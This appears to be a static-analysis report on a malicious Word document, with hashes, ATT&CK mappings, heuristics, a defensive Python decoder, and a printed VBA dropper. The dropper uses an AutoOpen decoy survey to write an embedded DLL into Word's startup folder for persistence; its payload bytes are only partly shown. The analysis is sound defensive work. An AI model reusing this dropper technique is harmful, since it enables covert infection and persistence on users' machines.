Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea50f6dd4d75e1a6…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 435.5 KB
Created: 2017-10-31 17:11:00
First seen: 2017-11-13
MD5: 18abb457e088b6658a4b4f53375137c3
SHA-1: 6941b273c6f53fbe9da2862d33f47c12911db0c1
SHA-256: ea50f6dd4d75e1a6c5c85121a9c21b9bfd535a4eb9b0ca5786a5a7b12d065d44
Risk score: 170

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1137.006 Office Application Startup: Add-ins (the .wll written to %APPDATA%\Microsoft\Word\STARTUP is a Word add-in that Word loads at every start)
T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) (the scanner's original tag; the persistence observed in this sample is Word-startup based, not a logon script, so T1137.006 is the closer fit)

The sample contains a VBA project whose ThisDocument module defines an AutoOpen subroutine, so the code runs as soon as the document is opened with macros enabled. AutoOpen shows a French-language pretext (a MsgBox thanking the user for taking part in a questionnaire), asks for the user's name with InputBox, and then calls DoIt; the value typed into the InputBox is never used, so the dialogs only make the document look like a survey while the drop proceeds. DoIt resolves %APPDATA% with Environ("appdata"), builds the path %APPDATA%\Microsoft\Word\STARTUP\WinWord-plgx64.wll and hands it to DumpFile; the DumpFile1 and WriteBytes routines that follow write the file. That directory is the per-user Word startup folder, and a .wll file placed there is a Word add-in (a DLL) that Word loads on every launch, which gives the dropped code persistence without any registry, service or scheduled-task change. The payload is not downloaded: the extracted source carries it inline as string literals of decimal byte values, which WriteBytes converts with Split() and Chr() and writes to the file one byte at a time. The first literals (77 90 144 0 ..., then the text "This program cannot be run in DOS mode." and 80 69 for "PE") are a standard MZ/PE header, so the dropped file is a Win32 PE image. The CreateObject call flagged by the heuristics is not inside the excerpt shown below; it is the usual way a macro of this shape obtains a FileSystemObject for the file write. Translated dialog text: "Name, first name:" (prompt titled "Identity", default value "DUPONT Marie"), "Thank you for your participation, this questionnaire will only take a few moments." and "This information is essential for proper development."

Heuristics (7)

  • OLE_VBA_MACROS (medium, 4 related findings): VBA macros detected. Document contains VBA macro code.
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro. Runs automatically when the document is opened with macros enabled.
  • OLE_VBA_CREATEOBJ (high): CreateObject call. Not visible in the excerpt shown below; in a dropper of this shape it is typically used to obtain a FileSystemObject for the file write.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_VBA_ENVIRON (low): Environ() call (environment variable access). Here it resolves %APPDATA% to build the drop path.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the "no modern VBA project was recovered" wording is the rule's generic description and does not hold for this sample, whose VBA project was extracted (macros.bas below); treat this hit as a second match on the AutoOpen name rather than as independent evidence.
  • EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into embedded drawing parts; it is not contacted at runtime and is not an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 232368 bytes
SHA-256: 1ccb2de84a5c1ad2bca99efce0e93de96b399483be60db7edc7331971bfe9709
Script preview: first 1,000 lines of the extracted script (the listing below is cut off inside DumpFile1)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Dim Info
    Main
    Info = InputBox("Nom, prénom :", "Identité", "DUPONT Marie")
    DoIt
End Sub


Private Sub Main()
    MsgBox "Nous vous remercions pour votre participation, ce questionnaire ne prendra que quelques instants."
End Sub


Attribute VB_Name = "Module1"
Sub DoIt()
    Dim strFile
    Dim Info
    Dim app
    MsgBox ("Ces informations sont indispensables au bon développement.")
    app = Environ("appdata")
    strFile = app + "\Microsoft\Word\STARTUP\WinWord-plgx64.wll"
    DumpFile strFile
End Sub


Sub WriteBytes(objFile, strBytes)
    Dim aNumbers
    Dim iIter

    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
        objFile.Write Chr(aNumbers(iIter))
    Next
End Sub

Sub DumpFile1(objFile)
    WriteBytes objFile, "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205"
    WriteBytes objFile, "33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111"
    WriteBytes objFile, "116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10"
    WriteBytes objFile, "36 0 0 0 0 0 0 0 52 159 243 187 112 254 157 232 112 254 157 232 112 254 157 232 129"
    WriteBytes objFile, "56 82 232 98 254 157 232 129 56 80 232 122 254 157 232 129 56 83 232 38 254 157 232"
    WriteBytes objFile, "112 254 156 232 62 254 157 232 140 137 36 232 115 254 157 232 83 17 78 232 115 254"
    WriteBytes objFile, "157 232 22 16 87 232 113 254 157 232 22 16 84 232 113 254 157 232 22 16 81 232 113"
    WriteBytes objFile, "254 157 232 82 105 99 104 112 254 157 232 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 80 69 0 0 76 1 5 0 17 171 248 89 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 100"
    WriteBytes objFile, "0 0 0 158 0 0 0 0 0 0 35 18 0 0 0 16 0 0 0 128 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0"
    WriteBytes objFile, "0 0 0 0 0 6 0 0 0 0 0 0 0 0 64 1 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0"
    WriteBytes objFile, "16 0 0 16 0 0 0 0 0 0 16 0 0 0 240 201 0 0 234 0 0 0 4 196 0 0 40 0 0 0 0 0 1 0 224"
    WriteBytes objFile, "1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 1 0 124 11 0 0 64 129 0 0 56 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 104 192 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "128 0 0 4 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116"
    WriteBytes objFile, "0 0 0 64 99 0 0 0 16 0 0 0 100 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114"
    WriteBytes objFile, "100 97 116 97 0 0 218 74 0 0 0 128 0 0 0 76 0 0 0 104 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "64 0 0 64 46 100 97 116 97 0 0 0 20 44 0 0 0 208 0 0 0 14 0 0 0 180 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 64 0 0 192 46 114 115 114 99 0 0 0 224 1 0 0 0 0 1 0 0 2 0 0 0 194 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 10 33 0 0 0 16 1 0 0"
    WriteBytes objFile, "34 0 0 0 196 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 
... (truncated)
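To check the conclusions above against the preview data rather than the scanner's wording, the following Python script is an added example (not code from the scanner, from oletools, or from the macro) that pulls the WriteBytes string literals out of a copy of the VBA source, decodes them the way the macro's Split()+Chr() loop does, and parses the result as a PE header; it also extracts the Word STARTUP drop path. The VBA excerpt it embeds is copied from the preview above (DoIt and the first eleven WriteBytes lines of DumpFile1, with the French MsgBox lines left out); the function names decode_writebytes, parse_pe_header and triage and the two regular expressions are the example's own.

```python
import re
import struct
from datetime import datetime, timezone

# Constructed sample input: the DoIt routine and the first WriteBytes lines of
# DumpFile1, copied from the macros.bas preview on this page. The remaining
# WriteBytes lines of the real file (several thousand) are omitted here.
VBA_EXCERPT = r'''
Sub DoIt()
    Dim strFile
    Dim app
    app = Environ("appdata")
    strFile = app + "\Microsoft\Word\STARTUP\WinWord-plgx64.wll"
    DumpFile strFile
End Sub

Sub DumpFile1(objFile)
    WriteBytes objFile, "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205"
    WriteBytes objFile, "33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111"
    WriteBytes objFile, "116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10"
    WriteBytes objFile, "36 0 0 0 0 0 0 0 52 159 243 187 112 254 157 232 112 254 157 232 112 254 157 232 129"
    WriteBytes objFile, "56 82 232 98 254 157 232 129 56 80 232 122 254 157 232 129 56 83 232 38 254 157 232"
    WriteBytes objFile, "112 254 156 232 62 254 157 232 140 137 36 232 115 254 157 232 83 17 78 232 115 254"
    WriteBytes objFile, "157 232 22 16 87 232 113 254 157 232 22 16 84 232 113 254 157 232 22 16 81 232 113"
    WriteBytes objFile, "254 157 232 82 105 99 104 112 254 157 232 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 80 69 0 0 76 1 5 0 17 171 248 89 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 100"
    WriteBytes objFile, "0 0 0 158 0 0 0 0 0 0 35 18 0 0 0 16 0 0 0 128 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0"
End Sub
'''

# One WriteBytes call per string literal. A literal cut off without its closing
# quote (as at the end of the preview) simply does not match.
WRITEBYTES_RE = re.compile(r'WriteBytes\s+\w+\s*,\s*"([0-9 ]+)"')
# A path under the per-user Word startup folder that ends in a .wll add-in.
STARTUP_RE = re.compile(r'\\Microsoft\\Word\\STARTUP\\([^"\\]+\.wll)', re.I)


def decode_writebytes(vba_src):
    """Do what the macro's Split()+Chr() loop does, but into a bytes object."""
    out = bytearray()
    for blob in WRITEBYTES_RE.findall(vba_src):
        for tok in blob.split():
            n = int(tok)
            if not 0 <= n <= 255:
                raise ValueError(f"not a byte value: {tok}")
            out.append(n)
    return bytes(out)


def parse_pe_header(data):
    """Parse the DOS header, the COFF header and the start of the optional
    header. Returns None if the data is not an MZ/PE image or is too short."""
    if len(data) < 64 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 60)
    if len(data) < e_lfanew + 56 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp, _symptr, _nsyms, _optsize, chars = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)       # optional header magic
    (entry,) = struct.unpack_from("<I", data, e_lfanew + 40)       # AddressOfEntryPoint
    (image_base,) = struct.unpack_from("<I", data, e_lfanew + 52)  # ImageBase (PE32)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,              # 0x14C = IMAGE_FILE_MACHINE_I386
        "sections": nsections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "is_dll": bool(chars & 0x2000),  # IMAGE_FILE_DLL
        "pe32": magic == 0x10B,
        "entry_point": entry,
        "image_base": image_base,
    }


def triage(vba_src):
    """The indicators a reviewer wants from this macro, in one dict."""
    blob = decode_writebytes(vba_src)
    m = STARTUP_RE.search(vba_src)
    return {
        "decoded_bytes": len(blob),
        "pe_header": parse_pe_header(blob),
        "word_startup_addin": m.group(1) if m else None,
        "uses_appdata_env": 'Environ("appdata")' in vba_src,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(VBA_EXCERPT), indent=2))
```

Run against the full macros.bas, the same decoder yields the complete add-in, which can then be hashed and analysed as a normal DLL. On the excerpt the header decodes to machine 0x14C (i386), five sections (matching the .text, .rdata, .data, .rsrc and .reloc names visible further down the preview), the IMAGE_FILE_DLL characteristic set, image base 0x10000000 and a COFF timestamp of 2017-10-31 16:55:45 UTC, the same afternoon as the document's Created time; a downloader would have none of this in its source.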